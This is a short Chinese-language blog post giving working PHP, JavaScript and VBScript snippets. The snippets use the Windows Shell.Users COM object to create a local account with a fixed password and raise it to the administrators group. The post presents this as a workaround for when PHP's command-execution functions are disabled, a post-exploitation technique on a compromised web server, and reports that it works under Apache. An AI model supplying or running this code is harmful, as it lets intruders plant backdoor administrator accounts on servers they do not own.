PHP 版Shell.Users加管理员
- 发表于
- 周边
当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen
以及wscript.shell 组建被禁用的情况下,这也许是一个机会。
代码如下:
1 2 3 4 5 6 7 8 9 |
<?php echo "<div align=center><b>PHP 版Shell.Users加管理员帐号</b></div>"; $username="abcdef"; $password="abcdef"; $su = new COM("Shell.Users"); $h=$su->create($username); $h->changePassword($password,""); $h->setting["AccountType"] = 3;//这句很重要可以把用户加入administrators 组, ?> |
对apache 搭建的Web 服务器可以执行成功,IIS 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。
下面是 LCX 的代码
JS:
1 2 3 4 |
var o=new ActiveXObject( "Shell.Users" ); z=o.create("test") ; z.changePassword("123456","") z.setting("AccountType")=3; |
vbs:
1 2 3 4 |
Set o=CreateObject( "Shell.Users" ) Set z=o.create("test") z.changePassword "123456","" z.setting("AccountType")=3 |
原文连接:PHP 版Shell.Users加管理员
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。